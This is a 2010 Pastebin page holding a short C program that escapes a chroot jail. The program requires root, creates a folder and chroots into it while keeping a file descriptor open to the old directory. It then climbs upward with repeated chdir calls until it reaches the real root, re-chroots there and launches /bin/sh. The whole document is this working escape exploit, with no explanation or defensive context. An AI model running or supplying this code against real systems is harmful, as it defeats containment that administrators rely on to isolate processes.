SHARE
TWEET

Untitled

a guest Mar 16th, 2010 508 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. /*
  2. Chema Garcia (a.k.a. sch3m4)
  3.  
  4. sch3m4@opensec.es
  5.  
  6. http://opensec.es
  7.  
  8. */
  9.  
  10. #include <stdlib.h>
  11. #include <stdio.h>
  12. #include <sys/stat.h>
  13. #include <sys/types.h>
  14. #include <fcntl.h>
  15. #include <unistd.h>
  16. #include <pwd.h>
  17.  
  18. #define FOLDER      "chbrk"
  19. #define PERM        0700
  20. #define MAX_CHDIR   200
  21.  
  22. #define SHELL       "/bin/sh"
  23.  
  24. int main()
  25. {
  26.     int           fd;
  27.     struct stat   statf;
  28.     ino_t         aux;
  29.     unsigned int  cont;
  30.     struct passwd *owner;
  31.     char          *directory;
  32.  
  33.     if(getuid()!=0)
  34.     {
  35.         fprintf(stderr,"\nThis program cannot work without root privileges\n");
  36.         return -1;
  37.     }
  38.  
  39.     fd=open(".",O_RDONLY);
  40.     mkdir(FOLDER,PERM);
  41.     chroot(FOLDER);
  42.     fchdir(fd);
  43.     close(fd);
  44.  
  45.     aux=0;
  46.     cont=0;
  47.     while(!stat(".",&statf) && aux!=statf.st_ino && cont++ < MAX_CHDIR)
  48.     {
  49.         aux=statf.st_ino;
  50.         chdir("..");
  51.     }
  52.  
  53.     if(aux==statf.st_ino)
  54.     {
  55.         chroot(".");
  56.         owner=getpwuid(statf.st_uid);
  57.  
  58.         directory=getcwd(0,0);
  59.         fprintf(stderr,"\n+=[ Done! ]=+\n");
  60.         fprintf(stderr,"\n+ Directory:  %s",directory);
  61.         fprintf(stderr,"\n+ Inode:      %d",(int)statf.st_ino);
  62.         fprintf(stderr,"\n+ Owner:      id=%d (%s) / gid=%d \n\n",owner->pw_uid,owner->pw_name,owner->pw_gid);
  63.         free(directory);
  64.  
  65.         execl(SHELL,(char*)0,(char*)0);
  66.     }
  67.  
  68.    return 0;
  69. }
RAW Paste Data
Top